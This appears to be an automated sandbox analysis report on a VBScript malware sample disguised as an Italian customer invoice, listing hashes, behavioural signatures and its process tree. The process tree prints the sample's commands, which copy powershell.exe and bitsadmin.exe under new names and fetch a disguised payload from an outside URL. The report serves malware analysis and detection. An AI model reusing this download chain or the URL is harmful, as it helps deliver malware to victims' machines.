Analysis
-
max time kernel
146s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
20-05-2022 14:38
Static task
static1
Behavioral task
behavioral1
Sample
Fatt_cliente_00453830309.vbs
Resource
win7-20220414-en
General
-
Target
Fatt_cliente_00453830309.vbs
-
Size
3KB
-
MD5
62b3b8b5c2ceacaee5e3e22939c45a43
-
SHA1
3a579492c1c373cb61ced3c7a88cffb13d73e1ac
-
SHA256
77e7a4deb92496d0954a6fd03cece71dfd53bc774cfb89dc16410c91cf09f598
-
SHA512
0b969e6f0163f22402bfb31f424ff33b8985a1406fd65936e4239b31ba1b75501cbea31bd944cd02c97d88e707e08097b83b8b258e2352b4f92286e09fac93d1
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 3680 FeUgzu.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 3684 wrote to memory of 3724 3684 WScript.exe 80 PID 3684 wrote to memory of 3724 3684 WScript.exe 80 PID 3684 wrote to memory of 4884 3684 WScript.exe 82 PID 3684 wrote to memory of 4884 3684 WScript.exe 82 PID 3684 wrote to memory of 3680 3684 WScript.exe 84 PID 3684 wrote to memory of 3680 3684 WScript.exe 84 PID 3684 wrote to memory of 3680 3684 WScript.exe 84
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_00453830309.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3684 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zFeUgzu.exe2⤵PID:3724
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\FeUgzu.exe2⤵PID:4884
-
-
C:\Users\Admin\AppData\Roaming\FeUgzu.exe"C:\Users\Admin\AppData\Roaming\FeUgzu.exe" /transfer DQeUoq /download https://sheyenneweber.com/webol/00453830309/uk.jpg C:\Users\Admin\AppData\Roaming\uk.jpg2⤵
- Executes dropped EXE
PID:3680
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
182KB
MD5f57a03fa0e654b393bb078d1c60695f3
SHA11ced6636bd2462c0f1b64775e1981d22ae57af0b
SHA256c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c
SHA5127e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a
-
Filesize
182KB
MD5f57a03fa0e654b393bb078d1c60695f3
SHA11ced6636bd2462c0f1b64775e1981d22ae57af0b
SHA256c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c
SHA5127e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a